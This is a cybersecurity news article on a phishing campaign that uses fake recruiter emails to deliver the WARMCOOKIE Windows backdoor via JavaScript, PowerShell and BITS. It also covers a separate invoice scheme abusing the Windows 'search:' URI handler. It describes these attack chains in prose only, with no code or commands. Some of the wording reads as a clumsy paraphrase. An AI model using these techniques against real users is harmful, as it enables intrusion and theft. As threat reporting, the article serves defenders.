Recent Phishing Scheme Unleashes WARMCOOKIE Backdoor Aimed at Job Seekers
Cybersecurity experts have revealed insights about an active phishing operation that utilizes job-related baits to distribute a Windows-driven backdoor known as WARMCOOKIE.
“Initial examinations suggest that WARMCOOKIE acts as a primary gateway tool to survey target networks and introduce supplementary threats,” outlined Daniel Stepanic from Elastic Security Labs in a recent report. “Each version comes with a fixed [command-and-control] IP address and RC4 key.”
The backdoor is equipped with functionalities to identify infected devices, capture screen snapshots, and deploy additional harmful software. The activity is being monitored by the organization under the moniker REF6127.
The attack instances spotted since the end of April involve emails pretending to be from hiring companies such as Hays, Michael Page, and PageGroup, persuading recipients to click on an embedded link for job details.
Individuals who proceed to click on the link are directed to download a file by completing a CAPTCHA challenge, after which a JavaScript file (“Update_23_04_2024_5689382.js”) is delivered.
“This disguised script initiates PowerShell, triggering the first step to load WARMCOOKIE,” reported Elastic. “The PowerShell script exploits the Background Intelligent Transfer Service (BITS) to fetch WARMCOOKIE.”
An essential aspect of the campaign is the usage of compromised infrastructure to host the original phishing URL, which is then employed to redirect victims to the correct landing page.
A Windows DLL, WARMCOOKIE follows a dual-phase process that enables setting up persistence via a scheduled task and activating the core functions after passing a set of preventive checks to avoid detection.
The backdoor is engineered to gather data about the infected machine akin to a component used in association with a prior operation codenamed Resident focusing on manufacturing, commercial, and healthcare entities.
Furthermore, it supports commands for reading from and writing to files, executing commands via cmd.exe, retrieving the list of installed applications, and capturing screenshots.
“WARMCOOKIE is a newly identified backdoor that is gaining traction and is being utilized in campaigns aimed at users globally,” outlined Elastic.
The disclosure coincides with Trustwave SpiderLabs uncovering an elaborate phishing scheme that utilizes fake invoices and exploits the Windows search functionality embedded in HTML code to dispense malware.
“The functionality provided is fairly basic, beneficial for threat groups in need of a lightweight backdoor to monitor victims and distribute more harmful payloads including ransomware.”
The fraudulent emails include a ZIP archive containing an HTML file, utilizing the traditional Windows “search:” URI protocol handler to exhibit a Shortcut (LNK) file hosted on an external server in the Windows Explorer, creating the illusion of a local search result.
“This LNK file points to a batch script (BAT) hosted on the same server, which, upon user click, could potentially activate more harmful operations,” noted Trustwave, mentioning the failure to retrieve the batch script due to unresponsiveness from the server.
It’s important to mention that the misuse of search-ms: and search: as a vector for malware distribution was detailed by Trellix in July 2023.
“While this attack doesn’t involve automatic malware installation, it does require user interaction with various prompts and clicks,” the company mentioned. “However, this technique cleverly masks the attacker’s true purpose, leveraging the user’s trust in familiar interfaces and common actions like opening email attachments.”
About Author
